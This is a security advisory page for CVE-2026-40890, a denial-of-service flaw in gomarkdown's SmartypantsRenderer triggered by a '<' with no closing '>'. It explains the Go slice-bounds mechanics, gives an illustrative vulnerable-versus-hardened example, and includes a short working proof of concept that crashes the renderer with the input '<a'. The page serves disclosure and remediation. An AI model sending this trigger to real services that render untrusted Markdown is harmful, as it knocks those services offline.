CVE-2026-40890

Severity: HIGH (CVSS 3.1 base score 7.5)
Published: 2026-04-14
Project: https://github.com/gomarkdown/markdown
Advisory: GHSA-77fj-vx54-gvh7

CVSS Vector (NVD)

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
Unchanged
Confidentiality
None
Integrity
None
Availability
High

Description (NVD)

Summary

Processing malformed input that contains a < character with no > character anywhere in the remaining text with a SmartypantsRenderer leads to an out-of-bounds read or a panic.

Details

The smartLeftAngle() function in html/smartypants.go:367-376 performs an out-of-bounds slice operation when processing a < character that is not followed by a > character anywhere in the remaining text:

https://github.com/gomarkdown/markdown/blob/37c66b85d6ab025ba67a73ba03b7f3ef55859cca/html/smartypants.go#L367-L376

Go checks a slice expression's upper bound against the capacity of the backing array, not against the slice's length. If the length of the slice is less than its capacity, the operation therefore succeeds and one extra byte beyond the intended end of the input is read. If the length equals the capacity, the runtime panics with a slice-bounds error.
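The slicing mechanics described above, as an added example that is not the project's code: vulnerableLeftAngle is my reconstruction of the pattern the advisory describes (scan forward to >, then write text[:i+1]), hardenedLeftAngle is one possible fix, and all function names and inputs below are constructed for illustration. It runs offline without importing gomarkdown, and pins the slice capacity explicitly so both outcomes (extra byte read, panic) can be shown from the same two-byte input.

```go
package main

import (
	"bytes"
	"fmt"
)

// vulnerableLeftAngle reproduces the slicing pattern described in the
// advisory (a reconstruction for illustration, not gomarkdown's code):
// scan forward for '>', then write text[:i+1]. When no '>' exists the loop
// stops at i == len(text), so the slice upper bound is len(text)+1. Go only
// checks that bound against cap(text), so the call either reads one byte past
// the logical end (cap > len) or panics (cap == len).
func vulnerableLeftAngle(out *bytes.Buffer, text []byte) int {
	i := 0
	for i < len(text) && text[i] != '>' {
		i++
	}
	out.Write(text[:i+1])
	return i
}

// hardenedLeftAngle is one way to close the hole: only step past the '>' if
// one was actually found, so the upper bound never exceeds len(text).
// It returns the number of bytes consumed.
func hardenedLeftAngle(out *bytes.Buffer, text []byte) int {
	i := 0
	for i < len(text) && text[i] != '>' {
		i++
	}
	if i < len(text) {
		i++ // include the closing '>' itself
	}
	out.Write(text[:i])
	return i
}

// runVulnerable drives the vulnerable function and converts a panic into a
// boolean so the outcomes can be compared side by side.
func runVulnerable(text []byte) (output string, panicked bool) {
	var buf bytes.Buffer
	defer func() {
		if r := recover(); r != nil {
			output, panicked = "", true
		}
	}()
	vulnerableLeftAngle(&buf, text)
	return buf.String(), false
}

// runHardened drives the hardened function and returns what it wrote plus the
// number of bytes it consumed.
func runHardened(text []byte) (string, int) {
	var buf bytes.Buffer
	n := hardenedLeftAngle(&buf, text)
	return buf.String(), n
}

func main() {
	// Constructed inputs. The 'X' sits just past the logical end of the
	// two-byte view "<a"; it stands in for whatever bytes happen to follow a
	// real input in memory.
	backing := []byte("<aX")
	leaky := backing[:2]   // len 2, cap >= 3: one extra byte is readable
	exact := backing[:2:2] // len 2, cap 2: full slice expression pins cap

	for _, c := range []struct {
		name string
		in   []byte
	}{
		{"well-formed \"<a>\"", []byte("<a>")},
		{"\"<a\" with cap > len", leaky},
		{"\"<a\" with cap == len", exact},
	} {
		out, panicked := runVulnerable(c.in)
		fmt.Printf("vulnerable %-24s -> output=%q panicked=%v\n", c.name, out, panicked)
		hout, n := runHardened(c.in)
		fmt.Printf("hardened   %-24s -> output=%q consumed=%d\n", c.name, hout, n)
	}
}
```

The same "<a" input either leaks the byte past its end into the output or panics, depending only on the capacity of the slice handed to the function; a service that passes request bodies straight through to the renderer does not control which of the two it gets, which is why the advisory lists both. The remediation is to upgrade to a gomarkdown release that includes the fix referenced by the advisory rather than to wrap the renderer in a recover().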

PoC

```go
package main

import (
	"bytes"
	"fmt"

	"github.com/gomarkdown/markdown/html"
)

func main() {
	// A '<' with no '>' anywhere after it is the trigger condition.
	src := []byte("<a")

	fmt.Printf("Input: %q  (len=%d, cap=%d)\n", src, len(src), cap(src))

	var buf bytes.Buffer
	sp := html.NewSmartypantsRenderer(html.Smartypants)
	// panics: slice bounds out of range
	// (if cap(src) > len(src) the extra byte is read instead and no panic occurs)
	sp.Process(&buf, src)

	fmt.Printf("Output: %q\n", buf.String())
}
```

Impact

An unrecovered panic terminates the process that is rendering the Markdown, so any service that runs a SmartypantsRenderer (for example, the HTML renderer configured with the Smartypants flag) over untrusted input can be taken down with a request of a few bytes: a Denial of Service. The CVSS vector rates confidentiality impact as None, so the single extra byte read in the cap > len case is not treated as an information disclosure.

-- The Datadog Security Team



CVE-2026-40890 vulnerability details – vuln.today
